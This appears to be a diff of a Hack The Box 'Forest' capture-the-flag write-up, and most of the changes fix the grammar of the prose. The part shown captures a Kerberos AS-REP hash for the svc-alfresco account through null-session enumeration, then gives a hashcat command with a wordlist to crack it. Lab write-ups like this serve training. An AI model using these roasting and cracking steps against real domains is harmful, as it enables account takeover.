meringue7/Writeups/HTB/Forest/Forest.md

 LDAP        10.129.62.73    389    FOREST           $krb5asrep$23$svc-alfresco@HTB.LOCAL:68342ef59bc941531618bb589cedd8b9$703ea2b719fbf84824611c4a36e59852274e2965faea332486dd5a722303a807aa6725bb329781f67eb5658f04b87d2ff9053d1840c47838b432d96101ca7dd50251a8c3d5c43a7835d5738ab027807d30692966ead77e33e4011fe47bb7a073a347afd640a2016bda5bdde0c0b96e5c08cd6019867d784be570a5796c7f238fd28cbd0defb930880719502dfd430d47bfe86c1a18de199a44a5163b11eddc794ef682f8d16c807c6b2bbc621a43506a4f5bbea0fc499c92f9f82b37f9e0a0689c938ac1e1cdd6a4dfff8bfe16c88965469cc3b8c89ef41655f9b8999dd3ab73885b7e083452
 ```

 Here is the hash!
-Notice that no userlist is necessary because the null session is allowed and the tool enumerate first the usernames and make the AS-REQ automaticaly for each users.
+Notice that no userlist is necessary because the null session is allowed, and the tool enumerates the usernames first and makes the AS-REQ automatically for each user.

 ## Cracking `svc-alfresco` hash

-I tried to crack this AS-REP hash with `Hashcat` to revael the `svc-alfresco` password.
+Now, I'll use **Hashcat** to crack this AS-REP hash and reveal the `svc-alfresco` password.

 ```bash
 # hashcat -m 18200 asreproast.txt /opt/lists/rockyou.txt